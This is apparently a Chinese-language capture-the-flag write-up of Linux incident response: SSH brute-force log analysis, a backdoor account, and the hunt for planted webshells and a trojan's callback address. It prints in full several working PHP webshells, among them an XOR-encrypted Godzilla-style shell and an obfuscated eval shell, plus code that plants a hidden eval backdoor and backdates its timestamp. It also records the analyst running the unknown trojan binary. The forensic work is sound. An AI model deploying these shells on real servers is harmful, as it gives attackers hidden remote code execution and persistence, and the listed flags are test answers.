Linux日志分析

1.有多少IP在爆破主机ssh的root帐号，如果有多个使用”,”分割小到大排序例如flag{192.168.200.1,192.168.200.2}

ssh登录日志存放在/var/log/auth.log

root@ip-10-0-10-1:/tmp# cat /var/log/auth.log.1 |grep -a "rhost"
Aug  1 07:40:48 linux-rz sshd[7461]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.35 
Aug  1 07:41:01 linux-rz sshd[7465]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.35 
Aug  1 07:41:11 linux-rz sshd[7468]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.35 
Aug  1 07:42:30 linux-rz sshd[7471]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.32  user=root
Aug  1 07:46:39 linux-rz sshd[7475]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:46:45 linux-rz sshd[7478]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:46:48 linux-rz sshd[7480]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:46:52 linux-rz sshd[7482]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:46:54 linux-rz sshd[7484]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:46:57 linux-rz sshd[7486]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:00 linux-rz sshd[7489]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:02 linux-rz sshd[7491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:05 linux-rz sshd[7493]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:08 linux-rz sshd[7495]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:11 linux-rz sshd[7497]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2  user=root
Aug  1 07:47:16 linux-rz sshd[7499]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2  user=root
Aug  1 07:47:18 linux-rz sshd[7501]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2  user=root
Aug  1 07:47:20 linux-rz sshd[7503]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2  user=root
Aug  1 07:47:23 linux-rz sshd[7525]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:28 linux-rz sshd[7528]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:30 linux-rz sshd[7530]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:33 linux-rz sshd[7532]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:47:37 linux-rz sshd[7534]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.2 
Aug  1 07:52:57 linux-rz sshd[7606]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.200.31  user=root

flag{192.168.200.2,192.168.200.31,192.168.200.32}

2.ssh爆破成功登陆的IP是多少，如果有多个使用”,”分割

root@ip-10-0-10-1:/tmp# cat /var/log/auth.log.1 |grep -a "Accepted"
Aug  1 07:47:23 linux-rz sshd[7505]: Accepted password for root from 192.168.200.2 port 46563 ssh2
Aug  1 07:50:37 linux-rz sshd[7539]: Accepted password for root from 192.168.200.2 port 48070 ssh2

flag{192.168.200.2}

3.爆破用户名字典是什么？如果有多个使用”,”分割

root@ip-10-0-10-1:/tmp# cat /var/log/auth.log.1 |grep -a "Failed password for"
Aug  1 07:40:50 linux-rz sshd[7461]: Failed password for invalid user test1 from 192.168.200.35 port 33874 ssh2
Aug  1 07:41:04 linux-rz sshd[7465]: Failed password for invalid user test2 from 192.168.200.35 port 51640 ssh2
Aug  1 07:41:13 linux-rz sshd[7468]: Failed password for invalid user test3 from 192.168.200.35 port 48168 ssh2
Aug  1 07:42:32 linux-rz sshd[7471]: Failed password for root from 192.168.200.32 port 51888 ssh2
Aug  1 07:46:41 linux-rz sshd[7475]: Failed password for invalid user user from 192.168.200.2 port 36149 ssh2
Aug  1 07:46:47 linux-rz sshd[7478]: Failed password for invalid user user from 192.168.200.2 port 44425 ssh2
Aug  1 07:46:50 linux-rz sshd[7480]: Failed password for invalid user user from 192.168.200.2 port 38791 ssh2
Aug  1 07:46:54 linux-rz sshd[7482]: Failed password for invalid user user from 192.168.200.2 port 37489 ssh2
Aug  1 07:46:56 linux-rz sshd[7484]: Failed password for invalid user user from 192.168.200.2 port 35575 ssh2
Aug  1 07:46:59 linux-rz sshd[7486]: Failed password for invalid user hello from 192.168.200.2 port 35833 ssh2
Aug  1 07:47:02 linux-rz sshd[7489]: Failed password for invalid user hello from 192.168.200.2 port 37653 ssh2
Aug  1 07:47:04 linux-rz sshd[7491]: Failed password for invalid user hello from 192.168.200.2 port 37917 ssh2
Aug  1 07:47:08 linux-rz sshd[7493]: Failed password for invalid user hello from 192.168.200.2 port 41957 ssh2
Aug  1 07:47:10 linux-rz sshd[7495]: Failed password for invalid user hello from 192.168.200.2 port 39685 ssh2
Aug  1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2
Aug  1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2
Aug  1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2
Aug  1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2
Aug  1 07:47:26 linux-rz sshd[7525]: Failed password for invalid user  from 192.168.200.2 port 37013 ssh2
Aug  1 07:47:30 linux-rz sshd[7528]: Failed password for invalid user  from 192.168.200.2 port 37545 ssh2
Aug  1 07:47:32 linux-rz sshd[7530]: Failed password for invalid user  from 192.168.200.2 port 39111 ssh2
Aug  1 07:47:35 linux-rz sshd[7532]: Failed password for invalid user  from 192.168.200.2 port 35173 ssh2
Aug  1 07:47:39 linux-rz sshd[7534]: Failed password for invalid user  from 192.168.200.2 port 45807 ssh2
Aug  1 07:52:59 linux-rz sshd[7606]: Failed password for root from 192.168.200.31 port 40364 ssh2

flag{user,hello,root,test3,test2,test1}

4.成功登录 root 用户的 ip 一共爆破了多少次

root@ip-10-0-10-1:/tmp# cat /var/log/auth.log.1 |grep -a "Failed password for root"
Aug  1 07:42:32 linux-rz sshd[7471]: Failed password for root from 192.168.200.32 port 51888 ssh2
Aug  1 07:47:13 linux-rz sshd[7497]: Failed password for root from 192.168.200.2 port 34703 ssh2
Aug  1 07:47:18 linux-rz sshd[7499]: Failed password for root from 192.168.200.2 port 46671 ssh2
Aug  1 07:47:20 linux-rz sshd[7501]: Failed password for root from 192.168.200.2 port 39967 ssh2
Aug  1 07:47:22 linux-rz sshd[7503]: Failed password for root from 192.168.200.2 port 46647 ssh2
Aug  1 07:52:59 linux-rz sshd[7606]: Failed password for root from 192.168.200.31 port 40364 ssh2

flag{4}

5.黑客登陆主机后新建了一个后门用户，用户名是多少

root@ip-10-0-10-1:/tmp# cat /var/log/auth.log.1 |grep -a "new user"
Aug  1 07:50:45 linux-rz useradd[7551]: new user: name=test2, UID=1000, GID=1000, home=/home/test2, shell=/bin/sh
Aug  1 08:18:27 ip-172-31-37-190 useradd[487]: new user: name=debian, UID=1001, GID=1001, home=/home/debian, shell=/bin/bash

flag{test2}

webshell查杀

黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

将/var/www/html目录下文件全部下载到本地，用D盾扫描,存在四个webshell,在html\include\gz.php的注释中找到flag

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

黑客使用的什么工具的shell github地址的md5 flag{md5}

通过搜索，发现是哥斯拉的webshell

github: https://github.com/BeichenDream/Godzilla

flag{39392de3218c333f794befef07ac9257}

黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

.开头的是隐藏的shell，所以是/var/www/html/include/Db/.Mysqli.php

flag{aebac0e58cd6c5fad1695ee4d1ac1919}

黑客免杀马完整路径 md5 flag{md5}

top.php通过字符串拼接来实现免杀效果以达到RCE目的

<?php

$key = "password";

//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
    $fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

Linux入侵排查

web目录存在木马，请找到木马的密码提交

仍然使用D盾，在1.php

flag{1}

服务器疑似存在不死马，请找到不死马的密码提交

.shell.php是生成的不死马，哈希是5d41402abc4b2a76b9719d911017c592,md5解密是hello

flag{hello}

不死马是通过哪个文件生成的，请提交文件名

<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
	$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
	Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
	Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

flag{index.php}

黑客留下了木马文件，请找出黑客的服务器ip提交

root@ip-10-0-10-1:~# chmod +x /var/www/html/shell\(1\).elf 
root@ip-10-0-10-1:~# /var/www/html/shell\(1\).elf

root@ip-10-0-10-1:~# netstat -ao
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 localhost:mysql         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 10.0.10.1:ssh           112.12.227.50:12445     ESTABLISHED keepalive (6663.40/0/0)
tcp        0      0 10.0.10.1:ssh           112.12.227.50:12505     ESTABLISHED keepalive (6687.05/0/0)
tcp        0      1 10.0.10.1:56262         10.11.55.21:3333        SYN_SENT    on (1.58/4/0)
tcp        0    324 10.0.10.1:ssh           112.12.227.50:12495     ESTABLISHED on (0.19/0/0)
tcp6       0      0 [::]:http               [::]:*                  LISTEN      off (0.00/0/0)
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN      off (0.00/0/0)
udp        0      0 10.0.10.1:ntp           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 localhost:ntp           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:ntp             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:bootpc          0.0.0.0:*                           off (0.00/0/0)
udp6       0      0 fe80::f7:2dff:febe::ntp [::]:*                              off (0.00/0/0)
udp6       0      0 ip6-localhost:ntp       [::]:*                              off (0.00/0/0)
udp6       0      0 [::]:ntp                [::]:*                              off (0.00/0/0)
Active UNIX domain sockets (servers and established)

flag{10.11.55.21}

黑客留下了木马文件，请找出黑客服务器开启的监端口提交

flag{3333}